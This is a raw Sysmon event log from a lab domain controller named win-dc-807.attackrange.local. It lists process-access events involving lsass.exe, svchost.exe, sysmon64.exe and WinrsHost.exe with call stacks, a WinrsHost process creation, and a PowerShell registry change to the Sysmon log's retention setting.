15:50:24.200{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.200{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.199{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.185{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.138{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:50:24.044{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:25.278{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:25.278{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:25.278{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 